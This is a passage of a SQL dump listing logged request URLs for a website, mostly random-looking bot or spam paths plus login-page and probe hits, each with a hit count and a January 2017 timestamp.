00:00:00'),(1843,'http://www.hallcrestheights.org/k15280-gnfznxvj-i20162636-xpalt-itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-06 09:05:49','0000-00-00 00:00:00'),(1844,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz-esrk-wtzqtqb-k43257-svjcwjbx-nmyvsssl-djznaah-i20162634-jbkwxros-holvg-wxkw/',NULL,'','',1,0,'2017-01-06 09:09:18','0000-00-00 00:00:00'),(1845,'http://www.hallcrestheights.org/k51640-upttmnbe-atgrb-i20162637-nqcdcncx-rdhcpgz-zdll.htm',NULL,'','',1,0,'2017-01-06 09:12:47','0000-00-00 00:00:00'),(1846,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-i20162631-jaylrl-wfvdy-k58673-ruqp-klsdef-hxdfpd-fufpfaj-npvza-ttuxd-wvpeekly/',NULL,'','',1,0,'2017-01-06 09:16:18','0000-00-00 00:00:00'),(1847,'http://www.hallcrestheights.org/k30040-zmkuedtz-jivyo-qxifgxuh-i20162628-xptvuhm-iwnz.htm',NULL,'','',1,0,'2017-01-06 09:19:47','0000-00-00 00:00:00'),(1848,'http://www.hallcrestheights.org/k49840-ixnmueah-whioz-i20162637-hjxbnwpg-eyooayi-kuks.htm',NULL,'','',3,0,'2017-01-06 09:23:18','0000-00-00 00:00:00'),(1849,'http://www.hallcrestheights.org/i20162635-k37600-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll.htm',NULL,'','',2,0,'2017-01-06 09:26:47','0000-00-00 00:00:00'),(1850,'http://www.hallcrestheights.org/k47320-fadlajfn-lgfpc-i20162632-vwgmyhde-cwxbdeu-dkov.htm',NULL,'','',1,0,'2017-01-06 09:33:49','0000-00-00 00:00:00'),(1851,'http://www.hallcrestheights.org/k26620-dvisciwb-vwkux-i20162632-krbzomsm-vuclzup-hvqa.htm',NULL,'','',1,0,'2017-01-06 09:37:19','0000-00-00 00:00:00'),(1852,'http://www.hallcrestheights.org/k46420-zmkuedtz-jivyo-i20162632-qxifgxuh-xptvuhm-iwnz.htm',NULL,'','',1,0,'2017-01-06 09:40:48','0000-00-00 00:00:00'),(1853,'http://www.hallcrestheights.org/cwhriwg-pekzq-dwkvum-i20162631-zbsaii-mjzfo-k59573-zgdv-ddqjvd-obknly-kconedw-jmaxe-vortb-zqsaxidi/',NULL,'','',1,0,'2017-01-06 09:44:18','0000-00-00 00:00:00'),(1854,'http://www.hallcrestheights.org/dvisc-iwbv/k6314-wkux-krbzomsm-vuclzuph-i20162633-vqawuo.htm',NULL,'','',1,0,'2017-01-06 09:45:40','0000-00-00 00:00:00'),(1855,'http://www.hallcrestheights.org/k29140-lugdltrs-mxxhy-pzqjllzo-i20162628-hnjumnt-ecwf.htm',NULL,'','',1,0,'2017-01-06 09:47:47','0000-00-00 00:00:00'),(1856,'http://www.hallcrestheights.org/i20162628-cwhriw-k58949-gpekzqdw-kvum-zbsai/',NULL,'','',2,0,'2017-01-06 09:54:56','0000-00-00 00:00:00'),(1857,'http://www.hallcrestheights.org/k5264-jglet-i20162633-kymd-rqzn-rvmlkswa.htm',NULL,'','',2,0,'2017-01-06 09:58:44','0000-00-00 00:00:00'),(1858,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-i20162628-qxdos-k58849-fiet/',NULL,'','',1,0,'2017-01-06 10:02:32','0000-00-00 00:00:00'),(1859,'http://www.hallcrestheights.org/k25964-ryvhr-i20162633-hmqt-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-01-06 10:10:04','0000-00-00 00:00:00'),(1860,'http://www.hallcrestheights.org/i20162630-lugd-ltrsmxx-k23082-hypzq-jllzoh/njumnte-cwfogywb-iwyrurf-gvfcwqzh-ribn-knyfeebs.htm',NULL,'','',1,0,'2017-01-06 10:12:16','0000-00-00 00:00:00'),(1861,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-i20162633-lgeajanp-k5164-dmefnxhq.htm',NULL,'','',1,0,'2017-01-06 10:13:53','0000-00-00 00:00:00'),(1862,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-i20162633-krbzomsm/k27114-vuclzuph-vqawuo-xzmnp-zvsgcr-lycmc-zoqqelu.htm',NULL,'','',1,0,'2017-01-06 10:14:09','0000-00-00 00:00:00'),(1863,'http://www.hallcrestheights.org/k23232-vqjn-yspvhol-jpeur-rtpilu-i20162630-ourxivl-btrhnnmt-qzkowts-xppbgrrc-dsik-ibkxnpfo-vpyaybgo.htm',NULL,'','',1,0,'2017-01-06 10:15:08','0000-00-00 00:00:00'),(1864,'http://www.hallcrestheights.org/lugdl-i20162633-trsm/k5714-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-06 10:16:03','0000-00-00 00:00:00'),(1865,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg-i20162632-zagp-k39389-eciyyuw/',NULL,'','',4,0,'2017-01-06 10:17:21','0000-00-00 00:00:00'),(1866,'http://www.hallcrestheights.org/pcscq-i20162633-rufu-npkw-xpoideot-k5364-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-06 10:21:26','0000-00-00 00:00:00'),(1867,'http://www.hallcrestheights.org/kzpffm-sxklrded-k16249-hwge-fvbbg-i20162629-zagp-eciyyuw-uvfztji/',NULL,'','',1,0,'2017-01-06 10:25:12','0000-00-00 00:00:00'),(1868,'http://www.hallcrestheights.org/k26064-jglet-i20162633-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl-qfcneb.htm',NULL,'','',1,0,'2017-01-06 10:32:46','0000-00-00 00:00:00'),(1869,'http://www.hallcrestheights.org/upttmnbe-atgrb/k5750-nqcdcncx-i20162635-rdhcpgz.htm',NULL,'','',1,0,'2017-01-06 10:35:25','0000-00-00 00:00:00'),(1870,'http://www.hallcrestheights.org/pcscq-k26164-rufu-npkw-xpoideot-wtvsoarm-i20162633-osmgep-lalhe-liyrqi-yqfuf.htm',NULL,'','',1,0,'2017-01-06 10:44:07','0000-00-00 00:00:00'),(1871,'http://www.hallcrestheights.org/soegsz-k59049-xyifetvt-ndyu-uhvfc-i20162628-yzls-xxqroxa-ehkskxy-xembu/',NULL,'','',1,0,'2017-01-06 10:47:55','0000-00-00 00:00:00'),(1872,'http://www.hallcrestheights.org/i20162628-kzpffm-k59149-sxklrded-hwge-fvbbg-zagp-eciyyuw-uvfztji-gjina-mzbcng/',NULL,'','',1,0,'2017-01-06 11:18:11','0000-00-00 00:00:00'),(1873,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-k52628-cdcncxrd-hcpgzzd-i20162632-llimvy-xjltf.htm',NULL,'','',3,0,'2017-01-06 11:21:55','0000-00-00 00:00:00'),(1874,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv-yxjlt-feobke-k26264-bwivs-mqkrfbm-lkmstho-wgwh.htm',NULL,'','',1,0,'2017-01-06 11:21:57','0000-00-00 00:00:00'),(1875,'http://www.hallcrestheights.org/jgle-tkymdrq/i20162630-k23282-znrvm-lkswaz.htm',NULL,'','',1,0,'2017-01-06 11:23:09','0000-00-00 00:00:00'),(1876,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj/i20162632-ikvf-vtzpx-k39139-bxkc/',NULL,'','',1,0,'2017-01-06 11:24:27','0000-00-00 00:00:00'),(1877,'http://www.hallcrestheights.org/k35980-dvisciwb-i20162636-vwkux-krbzomsm-vuclzup-hvqa.htm',NULL,'','',1,0,'2017-01-06 11:25:44','0000-00-00 00:00:00'),(1878,'http://www.hallcrestheights.org/ryvhrhmq-i20162635-tyysl/k5450-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-06 11:25:45','0000-00-00 00:00:00'),(1879,'http://www.hallcrestheights.org/dvis-k23032-ciwbvwk-i20162630-uxkrb-zomsmv-uclzuph-vqawuoxz-mnpzvsg-crlycmcz-oqqe.htm',NULL,'','',1,0,'2017-01-06 11:27:01','0000-00-00 00:00:00'),(1880,'http://www.hallcrestheights.org/k5550-jgletkym-drqzn-rvmlkswa-zvkecqq/neei-i20162635-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-06 11:28:19','0000-00-00 00:00:00'),(1881,'http://www.hallcrestheights.org/i20162635-k16000-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz.htm',NULL,'','',2,0,'2017-01-06 11:29:31','0000-00-00 00:00:00'),(1882,'http://www.hallcrestheights.org/wbwpbon-kydhx-i20162630-jjikvf-vtzpxb-xkcwj-k56273-ybty/',NULL,'','',1,0,'2017-01-06 11:29:40','0000-00-00 00:00:00'),(1883,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab/tnwyrqse-i20162633-k10978-mgwkowh-memxgk.htm',NULL,'','',1,0,'2017-01-06 11:30:55','0000-00-00 00:00:00'),(1884,'http://www.hallcrestheights.org/wp-login.php',NULL,'','',306,0,'2017-01-06 11:31:05','0000-00-00 00:00:00'),(1885,'http://www.hallcrestheights.org/lugdltrs-k36550-mxxhy-pzqjllzo-hnjumnt/ecwf-ogywb-iwyrur-i20162635-fgvf-cwqzhrib.htm',NULL,'','',3,0,'2017-01-06 11:32:13','0000-00-00 00:00:00'),(1886,'http://www.hallcrestheights.org/k40120-edzvdlqc-i20162631-omnnm-mcawvbfu-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-06 11:33:18','0000-00-00 00:00:00'),(1887,'http://www.hallcrestheights.org/k11578-pcscqru-i20162633-funpkwxp-oideotwt/vsoarmo-smgepl-alhel-iyrqiyqf.htm',NULL,'','',1,0,'2017-01-06 11:33:29','0000-00-00 00:00:00'),(1888,'http://hallcrestheights.org/libraries/joomla/russia.php',NULL,'','',9,0,'2017-01-06 11:34:38','0000-00-00 00:00:00'),(1889,'http://www.hallcrestheights.org/ixnm-ueahwhi/i20162634-k31562-ozhjx-bnwpge.htm',NULL,'','',1,0,'2017-01-06 11:34:47','0000-00-00 00:00:00'),(1890,'http://www.hallcrestheights.org/k15480-zmkuedtz-jivyo-qxifgxuh-xptvuhm-i20162636-iwnz-korpv-ubfgnq-tpmh.htm',NULL,'','',1,0,'2017-01-06 11:36:04','0000-00-00 00:00:00'),(1891,'http://www.hallcrestheights.org/soegsz-k16149-xyifetvt-ndyu-i20162629-uhvfc-yzls-xxqroxa-ehkskxy-xembu-qudtwq-ceyv-uciwqwsg/',NULL,'','',1,0,'2017-01-06 11:37:04','0000-00-00 00:00:00'),(1892,'http://www.hallcrestheights.org/i20162632-k39739-htxwhy-krsvsvhu-dykb/qxdos-fiet-yuaixnr-bdggsaa/',NULL,'','',1,0,'2017-01-06 11:37:22','0000-00-00 00:00:00'),(1893,'http://www.hallcrestheights.org/vqjn-yspvhol-i20162634-jpeur/rtpilu-ourxivl-k31162-btrhnnmt-qzkowts.htm',NULL,'','',1,0,'2017-01-06 11:38:38','0000-00-00 00:00:00'),(1894,'http://www.hallcrestheights.org/i20162636-dvisciwb-vwkux/k15830-krbzomsm-vuclzup.htm',NULL,'','',1,0,'2017-01-06 11:39:57','0000-00-00 00:00:00'),(1895,'http://www.hallcrestheights.org/k24820-ryvhrhmq-tyysl-i20162632-lgeajanp-dmefnxh-qfhj.htm',NULL,'','',1,0,'2017-01-06 11:40:52','0000-00-00 00:00:00'),(1896,'http://www.hallcrestheights.org/k7890-jgletkym-drqzn-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-i20162628-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-06 11:41:14','0000-00-00 00:00:00'),(1897,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot/wtvsoarm-osmgep-lalhe-i20162633-k26814-liyrqi-yqfuf-xvugowo-pegtqam.htm',NULL,'','',1,0,'2017-01-06 11:42:31','0000-00-00 00:00:00'),(1898,'http://www.hallcrestheights.org/dvisc-i20162633-iwbv-wkux-krbzomsm-k26464-vuclzuph-vqawuo-xzmnp.htm',NULL,'','',1,0,'2017-01-06 11:43:49','0000-00-00 00:00:00'),(1899,'http://www.hallcrestheights.org/k50740-vqjnyspv-holjp-i20162637-eurrtpil-uourxiv-lbtr.htm',NULL,'','',2,0,'2017-01-06 11:44:39','0000-00-00 00:00:00'),(1900,'http://www.hallcrestheights.org/i20162628-vqjnyspv-k7840-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi.htm',NULL,'','',2,0,'2017-01-06 11:45:07','0000-00-00 00:00:00'),(1901,'http://www.hallcrestheights.org/i20162632-k52928-gnfznxv-jxpaltit-jshkyjyl-dpijaam.htm',NULL,'','',3,0,'2017-01-06 11:46:24','0000-00-00 00:00:00'),(1902,'http://www.hallcrestheights.org/yembjv-k39439-htqqdckz-fltz-terqb/i20162632-wnsw-nsnjplp-ftrrjnc-ypjoq-wgzjev/',NULL,'','',1,0,'2017-01-06 11:47:41','0000-00-00 00:00:00'),(1903,'http://www.hallcrestheights.org/i20162635-k16900-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov.htm',NULL,'','',1,0,'2017-01-06 11:48:26','0000-00-00 00:00:00'),(1904,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov-i20162637-k50440-fiibp-tquhzx.htm',NULL,'','',4,0,'2017-01-06 11:48:58','0000-00-00 00:00:00'),(1905,'http://www.hallcrestheights.org/gnfz-nxvjxpa-k10262-ltitj-shkyjy/ldpijaa-mdurtaen-i20162634-pggwtdv-lxtdqkun-fglq-rhzyonxf-eqnzsvvb-pzwdhkv.htm',NULL,'','',1,0,'2017-01-06 11:50:15','0000-00-00 00:00:00'),(1906,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja-ylrlwfv-k24977-dyruqpkl-sdefhxdf-i20162635-pdfufpf-ajnpvzat-tuxdw-vpee-klyzxq/',NULL,'','',1,0,'2017-01-06 11:51:05','0000-00-00 00:00:00'),(1907,'http://www.hallcrestheights.org/k8340-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-i20162628-cwqzhrib-nknyfeeb.htm',NULL,'','',1,0,'2017-01-06 11:51:33','0000-00-00 00:00:00'),(1908,'http://www.hallcrestheights.org/htxwhyk-rsvsv-i20162630-hudykb-qxdosf-ietyu-k45173-aixn-rbdggs-aarhef-skjydmr-ujwim-jqiaa-urihcywn/',NULL,'','',1,0,'2017-01-06 11:52:13','0000-00-00 00:00:00'),(1909,'http://www.hallcrestheights.org/i20162632-k32184-dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr.htm',NULL,'','',1,0,'2017-01-06 11:52:50','0000-00-00 00:00:00'),(1910,'http://www.hallcrestheights.org/i20162632-soegsz-xyifetvt-ndyu-uhvfc-yzls-k39289-xxqroxa-ehkskxy/',NULL,'','',3,0,'2017-01-06 11:54:08','0000-00-00 00:00:00'),(1911,'http://www.hallcrestheights.org/i20162628-gnfznxvj-xpalt-k8390-itjshkyj-yldpija/amdu-rtaen-pggwtd-vlxt-dqkunfgl-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-06 11:55:25','0000-00-00 00:00:00'),(1912,'http://www.hallcrestheights.org/qlbowci-ggece-i20162630-ayafxr-glnikg-hhmbb-k46073-xpge-smrcai-ztbiau-wdtvixp-mtzhz-zwzrq-rdcfpsmf/',NULL,'','',1,0,'2017-01-06 11:56:00','0000-00-00 00:00:00'),(1913,'http://www.hallcrestheights.org/i20162632-jglet-kymd/k53234-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-06 11:56:43','0000-00-00 00:00:00'),(1914,'http://www.hallcrestheights.org/k57400-gnfznxvj-xpalt-itjshkyj-yldpija-i20162634-amdu.htm',NULL,'','',3,0,'2017-01-06 11:59:50','0000-00-00 00:00:00'),(1915,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-terqb-wnsw-i20162633-k7589-nsnjplp-ftrrjnc-ypjoq-wgzjev-ihsd-pacaylhy-ayzeueiz/',NULL,'','',1,0,'2017-01-06 12:03:39','0000-00-00 00:00:00'),(1916,'http://www.hallcrestheights.org/ixnmu-eahw/k52934-hioz-hjxbnwpg-i20162632-eyooayik-uksszq.htm',NULL,'','',1,0,'2017-01-06 12:08:19','0000-00-00 00:00:00'),(1917,'http://www.hallcrestheights.org/upttmnb-eatgrbnq/i20162632-cdcncxrd-k53278-hcpgzzd-llimvy.htm',NULL,'','',1,0,'2017-01-06 12:09:37','0000-00-00 00:00:00'),(1918,'http://www.hallcrestheights.org/i20162630-ixnm-ueahwhi-k43782-ozhjx-bnwpge/yooayik-uksszqce-baqdomy-tniholbd-enta-fymluzex.htm',NULL,'','',1,0,'2017-01-06 12:10:54','0000-00-00 00:00:00'),(1919,'http://www.hallcrestheights.org/k36880-jgletkym-i20162636-drqzn-rvmlkswa-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-06 12:11:08','0000-00-00 00:00:00'),(1920,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz/terqb-wnsw-i20162629-nsnjplp-ftrrjnc-k4599-ypjoq/',NULL,'','',1,0,'2017-01-06 12:12:11','0000-00-00 00:00:00'),(1921,'http://www.hallcrestheights.org/i20162634-mrcq-gbeifuw/k10562-grabt-nwyrqs-emgwkow-hmemxgku.htm',NULL,'','',1,0,'2017-01-06 12:13:29','0000-00-00 00:00:00'),(1922,'http://www.hallcrestheights.org/jgle-k11062-tkymdrq-znrvm-lkswaz/vkecqqn-eeiaqjzl-i20162634-nplqfcn-ebxilnvo-xbdj.htm',NULL,'','',1,0,'2017-01-06 12:14:47','0000-00-00 00:00:00'),(1923,'http://www.hallcrestheights.org/i20162635-k36700-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr.htm',NULL,'','',1,0,'2017-01-06 12:14:54','0000-00-00 00:00:00'),(1924,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-cmckf-i20162632-rdtf-k60689-kgpvbch-siwhork-lvzrt-jrsyoa-ayfw-gdxskmyu-kcmbqrmk/',NULL,'','',1,0,'2017-01-06 12:16:04','0000-00-00 00:00:00'),(1925,'http://www.hallcrestheights.org/k25720-mrcqgbei-fuwgr-i20162632-abtnwyrq-semgwko-whme.htm',NULL,'','',1,0,'2017-01-06 12:22:32','0000-00-00 00:00:00'),(1926,'http://www.hallcrestheights.org/k41020-gnfznxvj-i20162631-xpalt-itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-06 12:26:16','0000-00-00 00:00:00'),(1927,'http://www.hallcrestheights.org/k39220-jgletkym-i20162631-drqzn-rvmlkswa-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-06 12:30:03','0000-00-00 00:00:00'),(1928,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-kovfii-bptqu-i20162633-hzxchh-k26364-rmxag-fpapuhg-fqvjdcl.htm',NULL,'','',1,0,'2017-01-06 12:32:50','0000-00-00 00:00:00'),(1929,'http://www.hallcrestheights.org/cwhriw-i20162629-gpekzqdw-kvum-zbsai-imjz-k16049-fozgdvd-dqjvdob-knlyk-conedw-jmax-evortbzq-saxidihg/',NULL,'','',1,0,'2017-01-06 12:33:50','0000-00-00 00:00:00'),(1930,'http://www.hallcrestheights.org/gnfznx-i20162635-vjxpal-k9716-titjsh-kyjy-ldpija-amdurt.htm',NULL,'','',3,0,'2017-01-06 12:37:37','0000-00-00 00:00:00'),(1931,'http://www.hallcrestheights.org/i20162628-bsoapa-zapstasg-mhcq-cmckf-rdtf-k58349-kgpvbch-siwhork-lvzrt-jrsyoa-ayfw-gdxskmyu-kcmbqrmk/',NULL,'','',1,0,'2017-01-06 12:41:25','0000-00-00 00:00:00'),(1932,'http://www.hallcrestheights.org/i20162634-fadlaj-fnlgfp-k51116-cvwgmy-hdec-wxbdeu-dkovfi.htm',NULL,'','',3,0,'2017-01-06 12:48:58','0000-00-00 00:00:00'),(1933,'http://www.hallcrestheights.org/gnfznx-vjxpal-k54176-titjsh-i20162637-kyjy-ldpija-amdurt.htm',NULL,'','',1,0,'2017-01-06 12:56:33','0000-00-00 00:00:00'),(1934,'http://www.hallcrestheights.org/tkuykf-i20162629-jdnjjbuc-yupa-jaylr-lwfv-k15149-dyruqpk-lsdefhx-dfpdf-ufpfaj-npvz-attuxdwv-peeklyzx/',NULL,'','',1,0,'2017-01-06 13:00:19','0000-00-00 00:00:00'),(1935,'http://www.hallcrestheights.org/upttm-nbea-k6764-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv.htm',NULL,'','',1,0,'2017-01-06 13:04:07','0000-00-00 00:00:00'),(1936,'http://www.hallcrestheights.org/k50190-zmkuedtz-jivyo-qxifgxuh-xptvuhm/iwnz-korpv-ubfgnq-i20162637-tpmh-prbikzon-mtlajhol.htm',NULL,'','',1,0,'2017-01-06 13:07:42','0000-00-00 00:00:00'),(1937,'http://www.hallcrestheights.org/pcscqr-ufunpk-k55076-wxpoid-i20162637-eotw-tvsoar-mosmge.htm',NULL,'','',1,0,'2017-01-06 13:07:53','0000-00-00 00:00:00'),(1938,'http://www.hallcrestheights.org/vqjnyspv-holjp/k50090-eurrtpil-i20162637-uourxiv-lbtr-hnnmt.htm',NULL,'','',1,0,'2017-01-06 13:08:58','0000-00-00 00:00:00'),(1939,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-i20162636-k15880-ecwf-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-06 13:10:21','0000-00-00 00:00:00'),(1940,'http://www.hallcrestheights.org/lugdltrs-mxxhy-i20162636-k36680-pzqjllzo-hnjumnt-ecwf-ogywb.htm',NULL,'','',1,0,'2017-01-06 13:11:34','0000-00-00 00:00:00'),(1941,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos-qxoq-kgqaqyd-k1757-cptznzvt-jqoevpca-i20162635-qwjaluw-tybckbsx-bnbgn-ndor-cajppe/',NULL,'','',1,0,'2017-01-06 13:11:40','0000-00-00 00:00:00'),(1942,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh/qfhj-dyhao-xrcjhw-k15330-uvds-vezytwlc-ycwscpua-i20162636-kqnjtn.htm',NULL,'','',1,0,'2017-01-06 13:12:51','0000-00-00 00:00:00'),(1943,'http://www.hallcrestheights.org/htxwhyk-rsvsv/i20162630-hudykb-k35423-qxdosf/',NULL,'','',1,0,'2017-01-06 13:14:08','0000-00-00 00:00:00'),(1944,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp/k36130-dmefnxh-i20162636-qfhj-dyhao-xrcjhw.htm',NULL,'','',1,0,'2017-01-06 13:15:25','0000-00-00 00:00:00'),(1945,'http://www.hallcrestheights.org/k43582-mrcq-gbeifuw-grabt/nwyrqs-emgwkow-i20162630-hmemxgku-cybnpzk.htm',NULL,'','',1,0,'2017-01-06 13:16:43','0000-00-00 00:00:00'),(1946,'http://www.hallcrestheights.org/k15180-dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-i20162636-mnpzvs-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-06 13:18:01','0000-00-00 00:00:00'),(1947,'http://www.hallcrestheights.org/vqjny-spvh-k5864-oljp-eurrtpil-uourxivl-i20162633-btrhnn.htm',NULL,'','',1,0,'2017-01-06 13:19:15','0000-00-00 00:00:00'),(1948,'http://www.hallcrestheights.org/fadl-ajfnlgf-pcvwg-myhdec-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-i20162634-k31512-papu-hgfqvjdc-lbbvzgrc.htm',NULL,'','',1,0,'2017-01-06 13:20:35','0000-00-00 00:00:00'),(1949,'http://www.hallcrestheights.org/vqjnys-pvholj-k33476-peurrt-i20162637-pilu-ourxiv-lbtrhn.htm',NULL,'','',1,0,'2017-01-06 13:23:01','0000-00-00 00:00:00'),(1950,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-rrtpiluo-k4408-urxivlb-i20162634-trhnnm.htm',NULL,'','',2,0,'2017-01-06 13:26:49','0000-00-00 00:00:00'),(1951,'http://www.hallcrestheights.org/i20162634-ryvhrh-mqtyys-k52016-llgeaj-anpd-mefnxh-qfhjdy.htm',NULL,'','',3,0,'2017-01-06 13:34:23','0000-00-00 00:00:00'),(1952,'http://www.hallcrestheights.org/mrcq-gbeifuw-k11212-grabt-nwyrqs-i20162634-emgwkow.htm',NULL,'','',2,0,'2017-01-06 13:45:06','0000-00-00 00:00:00'),(1953,'http://www.hallcrestheights.org/i20162630-mrcqgbe-ifuwgrab-tnwyrqse-k37888-mgwkowh-memxgk.htm',NULL,'','',1,0,'2017-01-06 13:45:47','0000-00-00 00:00:00'),(1954,'http://www.hallcrestheights.org/ixnmueah-whioz-k50490-hjxbnwpg/eyooayi-kuks-i20162637-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-06 13:46:22','0000-00-00 00:00:00'),(1955,'http://www.hallcrestheights.org/ryvh-rhmqtyy/i20162630-k43982-sllge-ajanpd.htm',NULL,'','',1,0,'2017-01-06 13:47:41','0000-00-00 00:00:00'),(1956,'http://www.hallcrestheights.org/k7990-pcscqruf-unpkw/xpoideot-i20162628-wtvsoar-mosm.htm',NULL,'','',1,0,'2017-01-06 13:48:58','0000-00-00 00:00:00'),(1957,'http://www.hallcrestheights.org/lugdl-trsm-i20162636-k21704-xxhy-pzqjllzo-hnjumnte-cwfogy.htm',NULL,'','',1,0,'2017-01-06 13:49:31','0000-00-00 00:00:00'),(1958,'http://www.hallcrestheights.org/k32112-edzv-dlqcomn-i20162634-nmmca-wvbfuj-apyvrlf-lxhqjkuh-kcmumbh-mgznkohe.htm',NULL,'','',1,0,'2017-01-06 13:50:16','0000-00-00 00:00:00'),(1959,'http://www.hallcrestheights.org/ixnmu-i20162633-eahw/k26414-hioz-hjxbnwpg.htm',NULL,'','',1,0,'2017-01-06 13:51:33','0000-00-00 00:00:00'),(1960,'http://www.hallcrestheights.org/mrcq-gbeifuw-i20162630-k23432-grabt-nwyrqs-emgwkow-hmemxgku.htm',NULL,'','',1,0,'2017-01-06 13:52:50','0000-00-00 00:00:00'),(1961,'http://www.hallcrestheights.org/mrcqg-beif-k53384-uwgr-abtnwyrq-i20162632-semgwkow-hmemxg.htm',NULL,'','',1,0,'2017-01-06 13:53:18','0000-00-00 00:00:00'),(1962,'http://www.hallcrestheights.org/oiyizgo-lrcmw-i20162630-fbsnop-dgfnhs-krljr-k55973-gfct-fzfiwx-wmakoa-yosmpql-gvegd-fvgcr-cbzmqnod/',NULL,'','',1,0,'2017-01-06 13:54:08','0000-00-00 00:00:00'),(1963,'http://www.hallcrestheights.org/jglet-kymd-k31784-rqzn-rvmlkswa-i20162632-zvkecqqn-eeiaqj.htm',NULL,'','',3,0,'2017-01-06 13:55:26','0000-00-00 00:00:00'),(1964,'http://www.hallcrestheights.org/i20162632-ajqxxu-k60489-cuzaofif-ephi-ijimj-njbo-gtsakbc-cgyfmdv-juxzl/',NULL,'','',1,0,'2017-01-06 13:56:43','0000-00-00 00:00:00'),(1965,'http://www.hallcrestheights.org/edzvd-lqco-k49064-mnnm-mcawvbfu-i20162632-japyvrlf-lxhqjk.htm',NULL,'','',1,0,'2017-01-06 13:57:03','0000-00-00 00:00:00'),(1966,'http://www.hallcrestheights.org/pcscqruf-unpkw/k26450-xpoideot-i20162635-wtvsoar.htm',NULL,'','',1,0,'2017-01-06 13:58:00','0000-00-00 00:00:00'),(1967,'http://www.hallcrestheights.org/vqjnyspv-holjp-i20162628-eurrtpil-uourxiv/lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-k8490-kibkxnpf-ovpyay.htm',NULL,'','',1,0,'2017-01-06 13:59:17','0000-00-00 00:00:00'),(1968,'http://www.hallcrestheights.org/edzv-dlqcomn/i20162630-k43682-nmmca-wvbfuj-apyvrlf-lxhqjkuh.htm',NULL,'','',1,0,'2017-01-06 14:00:35','0000-00-00 00:00:00'),(1969,'http://www.hallcrestheights.org/i20162630-zmkuedt-zjivyoqx-ifgxuhxp-k58588-tvuhmiw-nzkorp.htm',NULL,'','',1,0,'2017-01-06 14:13:17','0000-00-00 00:00:00'),(1970,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-dgfnh-i20162632-skrl-k49889-jrgfctf-zfiwxwm-akoay-osmpql-gveg-dfvgcrcb-zmqnoduu/',NULL,'','',1,0,'2017-01-06 14:16:01','0000-00-00 00:00:00'),(1971,'http://www.hallcrestheights.org/gnfzn-xvjx-k26564-palt-itjshkyj-yldpijaa-i20162633-mdurta.htm',NULL,'','',1,0,'2017-01-06 14:19:47','0000-00-00 00:00:00'),(1972,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-jshkyjyl-k25108-dpijaam-i20162634-durtae.htm',NULL,'','',3,0,'2017-01-06 14:23:38','0000-00-00 00:00:00'),(1973,'http://www.hallcrestheights.org/i20162628-ryvhrhmq-tyysl/k7790-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-06 14:25:06','0000-00-00 00:00:00'),(1974,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k59540-vwgmyhde-i20162637-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-06 14:26:24','0000-00-00 00:00:00'),(1975,'http://www.hallcrestheights.org/pcscq-rufu-k27464-npkw-xpoideot-wtvsoarm-i20162633-osmgep.htm',NULL,'','',1,0,'2017-01-06 14:27:21','0000-00-00 